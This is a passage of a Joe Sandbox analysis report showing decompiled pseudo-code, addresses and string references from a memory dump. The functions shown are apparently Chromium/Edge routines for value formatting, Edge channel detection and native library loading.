									__eax = L00CC71C0(__ebx, __edi, __esi, __eflags, __fp0, __esi, "%s", __eax);
									__eflags = _v37;
									if(_v37 < 0) {
										__eax = L00CFDBEC(_v48);
									}
									goto L36;
								}
								__eflags = __al - 2;
								if(__al < 2) {
									goto L31;
								}
								__eflags = __cl - 0x2d;
								if(__cl != 0x2d) {
									goto L31;
								}
								_t20 =  &_v47; // 0x2d
								__eax = _t20;
								L40:
								__eflags =  *__eax - 0x2e;
								if( *__eax != 0x2e) {
									goto L31;
								}
								_t32 =  &_v48; // 0x40
								__ecx = _t32;
								_push(0xd2fbcd);
								_push(1);
								goto L30;
							}
						}
						asm("movsd xmm0, [esp]");
						asm("movsd [esp+0x18], xmm0");
						__eax = L00D0CE27(__edi);
						__eflags = __ax - 2;
						if(__eflags != 0) {
							asm("xorpd xmm0, xmm0");
							asm("ucomisd xmm0, [esp]");
							if(__eflags <= 0) {
								__eax = "\"Infinity\"";
								__edx = "Infinity";
							} else {
								__eax = "\"-Infinity\"";
								__edx = "-Infinity";
							}
						} else {
							__eax = "\"NaN\"";
							__edx = "NaN";
						}
						__eflags = __bl;
						__edx =  !=  ? __eax : __edx;
						_t21 =  &_v48; // 0x3c
						__ecx = _t21;
						__eax = E00CB4920(_t21, __fp0, __edx);
						goto L31;
					case 4:
						__eax = "\"0x%llx\"";
						__edx = "0x%llx";
						__eflags = __bl;
						__edx =  !=  ? "\"0x%llx\"" : "0x%llx";
						__eflags = __edx;
						_push(0);
						_push( *__ecx);
						_push(__edx);
						L11:
						_push(__esi);
						__eax = L00CC71C0(__ebx, __edi, __esi, __eflags, __fp0);
						__esp = __esp + 0x10;
						goto L36;
					case 5:
						_t45 =  !=  ?  *_t39 : "NULL";
						_t57 = _t38;
						if(_t38 == 0) {
							_push(_t45);
							_t34 = E00CB513A(_t38, _t47, __fp0);
						} else {
							_t34 = L00CEBF40(_t57, __fp0, _t45, E00D131A0(_t45), 1, _t47);
						}
						goto L36;
					case 6:
						__edi =  *__ecx;
						__eax =  *__edi;
						__ebx = ( *__edi)[4];
						__ecx = __ebx;
						__eax =  *0xd57000();
						__ecx = __edi;
						_push(__esi);
						__eax =  *__ebx();
						goto L36;
					case 7:
						__ecx = __esi;
						_push("\"Unsupported (crbug.com/1225176)\"");
						__eax = E00CB513A(__ebx, __ecx, __fp0);
						goto L36;
				}
			}

0x00ceb9c0
0x00ceb9c6
0x00ceb9c8
0x00ceb9cc
0x00ceb9d0
0x00cebc14
0x00cebc26
0x00cebc26
0x00ceb9d6
0x00ceb9d9
0x00ceb9dd
0x00000000
0x00ceba13
0x00ceba16
0x00ceba1b
0x00ceba20
0x00ceba23
0x00ceba25
0x00ceba26
0x00000000
0x00000000
0x00ceba30
0x00ceba33
0x00ceba35
0x00000000
0x00000000
0x00ceba3f
0x00ceba42
0x00ceba44
0x00000000
0x00000000
0x00ceba4b
0x00ceba4f
0x00ceba57
0x00ceba5f
0x00ceba67
0x00ceba6c
0x00ceba72
0x00ceba72
0x00ceba77
0x00ceba7f
0x00ceba82
0x00cebb0e
0x00cebb11
0x00cebb17
0x00cebb1d
0x00cebb1d
0x00cebb24
0x00cebb29
0x00cebb2c
0x00cebb32
0x00cebb37
0x00cebb3a
0x00cebb3c
0x00cebb3c
0x00cebb44
0x00cebb49
0x00cebb4c
0x00cebb4e
0x00cebb4e
0x00cebb56
0x00cebb5b
0x00cebb5e
0x00cebb60
0x00cebb60
0x00cebb64
0x00cebb69
0x00cebb69
0x00cebb5e
0x00cebb4c
0x00cebb6e
0x00cebb73
0x00cebb75
0x00cebbc5
0x00cebbc9
0x00cebbcc
0x00cebbcf
0x00cebc29
0x00cebc2e
0x00000000
0x00000000
0x00cebc30
0x00cebc33
0x00000000
0x00000000
0x00cebc35
0x00cebc35
0x00000000
0x00cebc35
0x00000000
0x00cebb77
0x00cebb77
0x00cebb7c
0x00cebb7f
0x00cebbd1
0x00cebbd1
0x00cebbd1
0x00cebbd5
0x00cebbda
0x00cebbdc
0x00cebbdc
0x00cebbe1
0x00cebbe1
0x00cebbe6
0x00cebbee
0x00cebbee
0x00cebbe8
0x00cebbe8
0x00cebbe8
0x00cebbf9
0x00cebc01
0x00cebc06
0x00cebc0c
0x00cebc11
0x00000000
0x00cebc06
0x00cebb81
0x00cebb83
0x00000000
0x00000000
0x00cebb85
0x00cebb88
0x00000000
0x00000000
0x00cebb8a
0x00cebb8a
0x00cebc36
0x00cebc36
0x00cebc39
0x00000000
0x00000000
0x00cebc3b
0x00cebc3b
0x00cebc3f
0x00cebc44
0x00000000
0x00cebc44
0x00cebb75
0x00ceba88
0x00ceba8d
0x00ceba94
0x00ceba9c
0x00cebaa0
0x00cebb93
0x00cebb97
0x00cebb9c
0x00cebbaa
0x00cebbaf
0x00cebb9e
0x00cebb9e
0x00cebba3
0x00cebba3
0x00cebaa6
0x00cebaa6
0x00cebaab
0x00cebaab
0x00cebbb4
0x00cebbb6
0x00cebbb9
0x00cebbb9
0x00cebbbe
0x00000000
0x00000000
0x00cebab5
0x00cebaba
0x00cebabf
0x00cebac1
0x00cebac1
0x00cebac4
0x00cebac6
0x00cebac8
0x00cebac9
0x00cebac9
0x00cebaca
0x00cebacf
0x00000000
0x00000000
0x00ceb9ed
0x00ceb9f0
0x00ceb9f2
0x00cebb03
0x00cebb04
0x00ceb9f8
0x00ceba06
0x00ceba0b
0x00000000
0x00000000
0x00cebad7
0x00cebad9
0x00cebadb
0x00cebade
0x00cebae0
0x00cebae6
0x00cebae8
0x00cebae9
0x00000000
0x00000000
0x00cebaf0
0x00cebaf2
0x00cebaf7
0x00000000
0x00000000

APIs

_strlen.LIBCMT ref: 00CEB9F9

Strings

%lld, xrefs: 00CEBA44
NaN, xrefs: 00CEBAAB
"NaN", xrefs: 00CEBAA6
true, xrefs: 00CEBA01, 00CEBA1B, 00CEBA25, 00CEBAC9, 00CEBAE8, 00CEBBF8
"Infinity", xrefs: 00CEBBAA
%llu, xrefs: 00CEBA35
Infinity, xrefs: 00CEBBAF
-Infinity, xrefs: 00CEBBA3, 00CEBBBD
false, xrefs: 00CEBA16
NULL, xrefs: 00CEB9E8, 00CEB9F8, 00CEBA05, 00CEBB03
"0x%llx", xrefs: 00CEBAB5
"Unsupported (crbug.com/1225176)", xrefs: 00CEBAF2
"-Infinity", xrefs: 00CEBB9E
0x%llx, xrefs: 00CEBABA, 00CEBAC8

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: _strlen
String ID: "-Infinity"$"0x%llx"$"Infinity"$"NaN"$"Unsupported (crbug.com/1225176)"$%lld$%llu$-Infinity$0x%llx$Infinity$NULL$NaN$false$true
API String ID: 4218353326-265266769
Opcode ID: d0e180c9647462c73bb19c7a8f1f4b19e16f7f256b7694b6d32d6f40ac0bf0fc
Instruction ID: 86a6361de87206323dc0a653c9b247bcbc51e845d24bd66384bdab2154cf4b8a
Opcode Fuzzy Hash: d0e180c9647462c73bb19c7a8f1f4b19e16f7f256b7694b6d32d6f40ac0bf0fc
Instruction Fuzzy Hash: 00615631608384AFCB119F22C852BBB7BF1DF85314F208929F4955A1A6DB308D85AB63

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2410 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CE2410(intOrPtr __ecx, void* __edx, void* __eflags, void* __fp0) {
				signed int _v20;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t70;
				intOrPtr _t74;
				void* _t79;
				intOrPtr _t80;
				void* _t81;
				intOrPtr _t82;
				void* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				signed int _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				signed char _t91;
				void* _t98;
				intOrPtr _t105;
				void* _t108;
				char _t110;
				signed int _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t131;

				_t131 = __fp0;
				_t98 = __edx;
				_t89 = __ecx;
				_t87 = __ecx;
				_t53 =  *0xd40014; // 0xfbddd969
				_v20 = _t53 ^ _t112;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				_t5 = _t89 + 0x18; // 0xd54c20
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = _t5;
				_t9 = _t89 + 0x24; // 0xd54c2c
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = _t9;
				_t57 = L00D13C30( *0xd43d8c, L"MSEdgeCanary");
				_t114 = _t113 + 8;
				if(_t57 == 0) {
					_push(0xa8);
					_t58 = L00CFDBBC();
					_t115 = _t114 + 4;
					_t105 = _t58;
					_t90 = _t58;
					_push(0);
					_push(E00CE26B0);
					_push(0xd368e0);
					_push("Microsoft.MSEdgeCanary");
				} else {
					_t79 = L00D13C30( *0xd43d8c, L"MSEdgeDev");
					_t117 = _t114 + 8;
					if(_t79 == 0) {
						_push(0xa8);
						_t80 = L00CFDBBC();
						_t115 = _t117 + 4;
						_t105 = _t80;
						_t90 = _t80;
						_push(0);
						_push(E00CE26B0);
						_push(0xd36908);
						_push("Microsoft.MSEdgeDev");
					} else {
						_t81 = L00D13C30( *0xd43d8c, L"MSEdgeBeta");
						_t118 = _t117 + 8;
						if(_t81 == 0) {
							_push(0xa8);
							_t82 = L00CFDBBC();
							_t115 = _t118 + 4;
							_t105 = _t82;
							_t90 = _t82;
							_push(0);
							_push(E00CE26B0);
							_push(0xd3692c);
							_push("Microsoft.MSEdgeBeta");
						} else {
							_t83 = L00D13C30( *0xd43d8c, L"MSEdgeInternal");
							_t119 = _t118 + 8;
							if(_t83 == 0) {
								_push(0xa8);
								_t84 = L00CFDBBC();
								_t115 = _t119 + 4;
								_t105 = _t84;
								_t90 = _t84;
								_push(0);
								_push(E00CE26B0);
								_push(0xd36954);
								_push("Microsoft.MSEdgeInternal");
							} else {
								_t85 = L00D13C30( *0xd43d8c, L"MSEdgeWebView");
								_push(0xa8);
								_t86 = L00CFDBBC();
								_t115 = _t119 + 0xc;
								_t105 = _t86;
								_t90 = _t86;
								_t126 = _t85;
								if(_t85 == 0) {
									_push(0);
									_push(E00CE26B0);
									_push(0xd36980);
									_push("Microsoft.MSEdgeWebView");
								} else {
									_push(0);
									_push(E00CE26B0);
									_push(0xd369a8);
									_push("Microsoft.MSEdgeStable");
								}
							}
						}
					}
				}
				L00CF8F40(_t87, _t90, _t98, _t126, _t131);
				_t109 =  *((intOrPtr*)(_t87 + 0x10));
				 *((intOrPtr*)(_t87 + 0x10)) = _t105;
				if( *((intOrPtr*)(_t87 + 0x10)) != 0) {
					L00CF8E70(_t87, _t109, _t131);
					L00CFDBEC(_t109);
					_t115 = _t115 + 4;
				}
				_t15 = _t87 + 0x14; // 0xd54c1c
				_v56 = _t15;
				_v48 = _t87;
				_t18 = _t87 + 0x20; // 0xd54c28
				_v52 = _t18;
				 *0xd54bf8 = 1;
				_t88 = 0;
				asm("o16 nop [eax+eax]");
				do {
					_t91 = _t88;
					_t101 =  !=  ? 1 : 0xbadbad << _t91;
					_v60 =  !=  ? 1 : 0xbadbad << _t91;
					_t108 =  !=  ? 0 : 1 << _t91;
					_t110 =  *((intOrPtr*)(0xd369d0 + _t88 * 4));
					_v44 = _t110;
					_v40 = E00D131A0(_t110);
					_v36 =  &_v44;
					_push( &_v32);
					E00CE3960(_v56, _t131,  &_v28,  &_v44, 0xd36d5f,  &_v36);
					 *((char*)(_v28 + 0x18)) = 0;
					_v44 = _t110;
					_t70 = E00D131A0(_t110);
					_t115 = _t115 + 8;
					_v40 = _t70;
					_v36 =  &_v44;
					_push( &_v32);
					E00CE3AA0(_v52, _t131,  &_v28,  &_v44, 0xd36d5f,  &_v36);
					_t74 = _v28;
					 *((intOrPtr*)(_t74 + 0x1c)) = _v60;
					 *((intOrPtr*)(_t74 + 0x18)) = 1;
					_t88 = _t88 + 1;
				} while (_t88 != 0x30);
				E00CFE643(_t74, _t88, _v20 ^ _t112,  &_v36, _t108, _t110);
				return _v48;
			}

0x00ce2410
0x00ce2410
0x00ce2410
0x00ce2419
0x00ce241b
0x00ce2422
0x00ce2425
0x00ce242c
0x00ce2433
0x00ce243a
0x00ce243d
0x00ce2444
0x00ce244b
0x00ce244e
0x00ce2451
0x00ce2458
0x00ce245f
0x00ce246d
0x00ce2472
0x00ce2477
0x00ce2512
0x00ce2517
0x00ce251c
0x00ce251f
0x00ce2521
0x00ce2523
0x00ce2525
0x00ce252a
0x00ce252f
0x00ce247d
0x00ce2488
0x00ce248d
0x00ce2492
0x00ce2536
0x00ce253b
0x00ce2540
0x00ce2543
0x00ce2545
0x00ce2547
0x00ce2549
0x00ce254e
0x00ce2553
0x00ce2498
0x00ce24a3
0x00ce24a8
0x00ce24ad
0x00ce255a
0x00ce255f
0x00ce2564
0x00ce2567
0x00ce2569
0x00ce256b
0x00ce256d
0x00ce2572
0x00ce2577
0x00ce24b3
0x00ce24be
0x00ce24c3
0x00ce24c8
0x00ce257e
0x00ce2583
0x00ce2588
0x00ce258b
0x00ce258d
0x00ce258f
0x00ce2591
0x00ce2596
0x00ce259b
0x00ce24ce
0x00ce24d9
0x00ce24e3
0x00ce24e8
0x00ce24ed
0x00ce24f0
0x00ce24f2
0x00ce24f4
0x00ce24f6
0x00ce25a2
0x00ce25a4
0x00ce25a9
0x00ce25ae
0x00ce24fc
0x00ce24fc
0x00ce24fe
0x00ce2503
0x00ce2508
0x00ce2508
0x00ce24f6
0x00ce24c8
0x00ce24ad
0x00ce2492
0x00ce25b3
0x00ce25b8
0x00ce25bb
0x00ce25c0
0x00ce25c4
0x00ce25ca
0x00ce25cf
0x00ce25cf
0x00ce25d2
0x00ce25d5
0x00ce25d8
0x00ce25db
0x00ce25de
0x00ce25e1
0x00ce25e8
0x00ce25ea
0x00ce25f0
0x00ce25f2
0x00ce2606
0x00ce2609
0x00ce2611
0x00ce2614
0x00ce261b
0x00ce2627
0x00ce262d
0x00ce2636
0x00ce2645
0x00ce264d
0x00ce2651
0x00ce2655
0x00ce265a
0x00ce265d
0x00ce2663
0x00ce266c
0x00ce267b
0x00ce2680
0x00ce2686
0x00ce2689
0x00ce268c
0x00ce268d
0x00ce269b
0x00ce26aa

APIs

_strlen.LIBCMT ref: 00CE261F
_strlen.LIBCMT ref: 00CE2655

Strings

Microsoft.MSEdgeInternal, xrefs: 00CE259B
Microsoft.MSEdgeCanary, xrefs: 00CE252F
Microsoft.MSEdgeDev, xrefs: 00CE2553
MSEdgeCanary, xrefs: 00CE2462
Microsoft.MSEdgeBeta, xrefs: 00CE2577
MSEdgeInternal, xrefs: 00CE24B3
Microsoft.MSEdgeStable, xrefs: 00CE2508
MSEdgeBeta, xrefs: 00CE2498
Microsoft.MSEdgeWebView, xrefs: 00CE25AE
MSEdgeWebView, xrefs: 00CE24CE
MSEdgeDev, xrefs: 00CE247D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: _strlen
String ID: MSEdgeBeta$MSEdgeCanary$MSEdgeDev$MSEdgeInternal$MSEdgeWebView$Microsoft.MSEdgeBeta$Microsoft.MSEdgeCanary$Microsoft.MSEdgeDev$Microsoft.MSEdgeInternal$Microsoft.MSEdgeStable$Microsoft.MSEdgeWebView
API String ID: 4218353326-4251218085
Opcode ID: 43caeebef7375085f10ecb9b9b851d9bdda9dc8c9df0559f499acc0d7d15d99d
Instruction ID: 5773c4b81d0271ae9d6de5661d7dc8605ff941fa8c96821d6a5818fe524d78d8
Opcode Fuzzy Hash: 43caeebef7375085f10ecb9b9b851d9bdda9dc8c9df0559f499acc0d7d15d99d
Instruction Fuzzy Hash: DD61B6B1E40348BFDB04DF65EC42B9E76E5AB44704F144029F905BB281EBB1DA498BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00CD10C0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 313
libraryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CD10C0(void* __eax, signed int* __ecx, void* __fp0, void** _a4, signed int _a8) {
				WCHAR* _v0;
				unsigned int _v20;
				signed int _v44;
				signed int _v48;
				char _v116;
				char _v120;
				char _v132;
				char _v136;
				void* _v140;
				signed int _v144;
				char _v148;
				char _v152;
				signed char _v153;
				signed int _v156;
				char _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t76;
				signed int _t79;
				intOrPtr _t85;
				signed int _t88;
				void* _t100;
				signed int _t103;
				signed int _t108;
				WCHAR* _t112;
				signed int _t113;
				signed int _t118;
				signed int _t123;
				signed int _t125;
				unsigned int _t127;
				signed int _t130;
				WCHAR* _t131;
				signed int _t135;
				signed int _t136;
				void* _t138;
				signed int _t141;
				intOrPtr _t142;
				signed int _t160;
				signed int _t162;
				signed int _t169;
				signed int _t171;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t194;
				signed int* _t195;
				intOrPtr* _t197;
				void* _t211;

				_t211 = __fp0;
				_push(__eax);
				_t180 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx));
				_t175 =  *((intOrPtr*)(__ecx + 4)) - _t76 >> 2;
				_t138 = _t175 + 1;
				if(_t138 >= 0x40000000) {
					E00D0E930(_t130, _t138, _t165, _t175, __ecx);
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 8)) - _t76;
					_t123 =  *((intOrPtr*)(__ecx + 8)) - _t76 >> 1;
					_t124 =  <=  ? _t138 : _t123;
					_t130 =  <  ?  <=  ? _t138 : _t123 : 0x3fffffff;
					if(0x3fffffff == 0) {
						_t125 = 0;
						__eflags = 0;
						L5:
						 *(_t125 + _t175 * 4) =  *_a4;
						_t169 = _t125 + _t175 * 4;
						_t160 = _t125 + _t130 * 4;
						 *_a4 = 0;
						_t127 = _t125 + _t175 * 4 + 4;
						_t179 =  *_t180;
						_t135 = _t180[1];
						if(_t135 == _t179) {
							 *_t180 = _t169;
							_t180[1] = _t127;
							_t180[2] = _t160;
							__eflags = _t179;
							if(_t179 != 0) {
								L10:
								return L00CFDBEC(_t179);
							}
							L15:
							return _t127;
						}
						_v20 = _t160;
						do {
							 *(_t169 - 4) =  *(_t135 - 4);
							 *(_t135 - 4) = 0;
							_t162 = _t135 - 4;
							_t169 = _t169 + 0xfffffffc;
							_t135 = _t162;
						} while (_t162 != _t179);
						_t179 =  *_t180;
						_t136 = _t180[1];
						 *_t180 = _t169;
						_t180[1] = _t127;
						_t127 = _v20;
						_t180[2] = _t127;
						if(_t136 != _t179) {
							do {
								_t26 = _t136 - 4; // -4
								_t187 = _t26;
								_t127 =  *(_t136 - 4);
								_t171 = _t127 >> 0x13;
								__eflags = _t171;
								asm("bt edx, ecx");
								if(_t171 < 0) {
									_push(_t127);
									_t127 = L00CBEA30(_t127, _t211);
									_t190 = _t190 + 4;
								}
								 *(_t136 - 4) = 0;
								_t136 = _t187;
								__eflags = _t187 - _t179;
							} while (_t187 != _t179);
						}
						if(_t179 == 0) {
							goto L15;
						}
						goto L10;
					}
					if(0x3fffffff < 0x40000000) {
						_push(0xfffffffc);
						_t125 = L00CFDBBC();
						_t190 = _t190 + 4;
						goto L5;
					}
				}
				L00C92E27();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t189 = _t190;
				_push(_t130);
				_push(_t175);
				_push(_t180);
				_t79 =  *0xd40014; // 0xfbddd969
				_v44 = _t79 ^ _t189;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x60], xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				L00CC4C80( &_v132, "LoadNativeLibraryHelper", "..\\..\\base\\native_library_win.cc", 0x6b);
				L00CC9DD0(_t130,  &_v116, _t165, __eflags, _t211,  &_v132, 0);
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x20], xmm0");
				L00CC4C80( &_v156, "LoadNativeLibraryHelper", "..\\..\\base\\native_library_win.cc", 0x71);
				_t194 = (_t190 & 0xfffffff0) - 0x80 + 0x20;
				L00CCB520(_t130,  &_v140, _t165, _t211,  &_v156, 0);
				_t85 =  *0xd515a4; // 0x0
				_t141 =  *0xd43e38; // 0x0
				_t166 =  *[fs:0x2c];
				_t142 =  *((intOrPtr*)( *[fs:0x2c] + _t141 * 4));
				__eflags = _t85 -  *((intOrPtr*)(_t142 + 4));
				if(_t85 >  *((intOrPtr*)(_t142 + 4))) {
					L00CFDC67(_t85, 0xd515a4);
					_t194 = _t194 + 4;
					__eflags =  *0xd515a4 - 0xffffffff;
					if( *0xd515a4 == 0xffffffff) {
						 *0xd515a0 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "AddDllDirectory");
						L00CFDCDD(0xd515a4);
						_t194 = _t194 + 4;
					}
				}
				_t131 = _v0;
				_t183 =  *0xd515a0; // 0x0
				__eflags = _t183;
				if(__eflags == 0) {
					L29:
					_v148 = 0xffffffff;
					_v144 = 0xffffffff;
					_v140 = 0xffffffff;
					E00CBA7D0( &_v148);
					_t88 = E00CC0460(_t166, __eflags, _t211,  &_v148);
					_t195 = _t194 + 4;
					__eflags = _t88;
					 *_t195 = _t183;
					if(_t88 == 0) {
						_t184 = 0;
						__eflags = _t131[5];
						if(_t131[5] < 0) {
							goto L37;
						}
					} else {
						_v160 = 0xffffffff;
						_v156 = 0xffffffff;
						_v152 = 0xffffffff;
						_t178 =  &_v160;
						L00CBAF30(_t131, _t166, _t211,  &_v160);
						_t108 = _v153 & 0x000000ff;
						__eflags = _t108;
						if(_t108 < 0) {
							_t108 = _v156;
						}
						__eflags = _t108;
						if(__eflags != 0) {
							E00CC0570(__eflags, _t211, _t178);
							_t195 =  &(_t195[1]);
						}
						__eflags = _t108;
						_t184 = _t108 & 0xffffff00 | _t108 != 0x00000000;
						E00CBA900(_t108 & 0xffffff00 | _t108 != 0x00000000,  &_v160);
						__eflags = _t131[5];
						if(_t131[5] < 0) {
							L37:
							_t131 =  *_t131;
						} else {
						}
					}
					_t177 = LoadLibraryW(_t131);
					__eflags = _a8;
					if(_a8 != 0) {
						__eflags = _t177;
						if(_t177 == 0) {
							 *_a8 = GetLastError();
						}
					}
					__eflags = _t184;
					if(__eflags != 0) {
						E00CC0570(__eflags, _t211,  &_v148);
						_t195 =  &(_t195[1]);
					}
					_t177 =  *_t195;
					 *_t195 = (0 | _t177 == 0x00000000) + (0 |  *_t195 == 0x00000000) * 2 + 1;
					_t185 =  *0xd515a8; // 0x0
					__eflags = _t185;
					if(__eflags == 0) {
						_t197 = _t195 - 0x14;
						asm("movdqa xmm0, [0xd361a0]");
						asm("movdqu [esp+0x4], xmm0");
						 *_t197 = "LibraryLoader.LoadNativeLibraryWindows";
						_t103 = L00CDEE30(_t131, _t166, _t177, __eflags, _t211);
						_t195 = _t197 + 0x14;
						_t185 = _t103;
						 *0xd515a8 = _t103;
					}
					_t132 =  *((intOrPtr*)( *_t185 + 0x14));
					 *0xd57000();
					E00CBA900( *((intOrPtr*)( *((intOrPtr*)( *_t185 + 0x14))))( *_t195),  &_v152);
				} else {
					__eflags = _t131[5];
					_t112 = _t131;
					if(_t131[5] < 0) {
						_t112 =  *_t131;
					}
					_t113 = LoadLibraryExW(_t112, 0, 0x1100);
					__eflags = _t113;
					if(_t113 == 0) {
						__eflags = _a8;
						if(__eflags != 0) {
							 *_a8 = GetLastError();
						}
						goto L29;
					} else {
						_t177 = _t113;
						_t185 =  *0xd515a8; // 0x0
						__eflags = _t185;
						if(__eflags == 0) {
							asm("movdqa xmm0, [0xd361a0]");
							asm("movdqu [esp+0x4], xmm0");
							 *((intOrPtr*)(_t194 - 0x14)) = "LibraryLoader.LoadNativeLibraryWindows";
							_t118 = L00CDEE30(_t131, _t166, _t177, __eflags, _t211);
							_t185 = _t118;
							 *0xd515a8 = _t118;
						}
						_t132 =  *((intOrPtr*)( *_t185 + 0x14));
						 *0xd57000();
						 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 0x14))))(0);
					}
				}
				E00CCB620(_t132,  &_v136, _t177, _t211);
				_t100 = L00CC9E30( &_v120, _t166, _t211);
				__eflags = _v48 ^ _t189;
				E00CFE643(_t100, _t132, _v48 ^ _t189, _t166, _t177, _t185);
				return _t177;
			}

0x00cd10c0
0x00cd10c6
0x00cd10c7
0x00cd10c9
0x00cd10d0
0x00cd10d3
0x00cd10dc
0x00cd11da
0x00cd10e2
0x00cd10e5
0x00cd10e9
0x00cd10ed
0x00cd10fb
0x00cd1100
0x00cd1120
0x00cd1120
0x00cd1122
0x00cd1127
0x00cd112a
0x00cd112d
0x00cd1133
0x00cd113c
0x00cd113f
0x00cd1141
0x00cd1146
0x00cd11c4
0x00cd11c6
0x00cd11c9
0x00cd11cc
0x00cd11ce
0x00cd1181
0x00000000
0x00cd1187
0x00cd11d0
0x00000000
0x00cd11d0
0x00cd114c
0x00cd1150
0x00cd1153
0x00cd1156
0x00cd115d
0x00cd1160
0x00cd1163
0x00cd1165
0x00cd1169
0x00cd116b
0x00cd116e
0x00cd1170
0x00cd1173
0x00cd1176
0x00cd117b
0x00cd119d
0x00cd119d
0x00cd119d
0x00cd11a0
0x00cd11aa
0x00cd11aa
0x00cd11b4
0x00cd11b7
0x00cd11b9
0x00cd11ba
0x00cd11bf
0x00cd11bf
0x00cd1190
0x00cd1197
0x00cd1199
0x00cd1199
0x00cd119d
0x00cd117f
0x00000000
0x00000000
0x00000000
0x00cd117f
0x00cd1108
0x00cd1115
0x00cd1116
0x00cd111b
0x00000000
0x00cd111b
0x00cd1108
0x00cd11df
0x00cd11e4
0x00cd11e5
0x00cd11e6
0x00cd11e7
0x00cd11e8
0x00cd11e9
0x00cd11ea
0x00cd11eb
0x00cd11ec
0x00cd11ed
0x00cd11ee
0x00cd11ef
0x00cd11f1
0x00cd11f3
0x00cd11f4
0x00cd11f5
0x00cd11ff
0x00cd1206
0x00cd120a
0x00cd120e
0x00cd1214
0x00cd121a
0x00cd1220
0x00cd1237
0x00cd1246
0x00cd124b
0x00cd124f
0x00cd1266
0x00cd126b
0x00cd1275
0x00cd127a
0x00cd127f
0x00cd1285
0x00cd128c
0x00cd128f
0x00cd1295
0x00cd1479
0x00cd147e
0x00cd1481
0x00cd1488
0x00cd14a5
0x00cd14af
0x00cd14b4
0x00cd14b4
0x00cd1488
0x00cd129b
0x00cd129e
0x00cd12a4
0x00cd12a6
0x00cd1320
0x00cd1320
0x00cd1328
0x00cd1330
0x00cd133e
0x00cd1344
0x00cd1349
0x00cd134c
0x00cd134e
0x00cd1351
0x00cd13ad
0x00cd13af
0x00cd13b3
0x00000000
0x00000000
0x00cd1353
0x00cd1353
0x00cd135b
0x00cd1363
0x00cd136b
0x00cd1372
0x00cd1377
0x00cd137c
0x00cd137e
0x00cd1380
0x00cd1380
0x00cd1384
0x00cd1386
0x00cd138b
0x00cd1392
0x00cd1392
0x00cd1395
0x00cd139a
0x00cd13a0
0x00cd13a5
0x00cd13a9
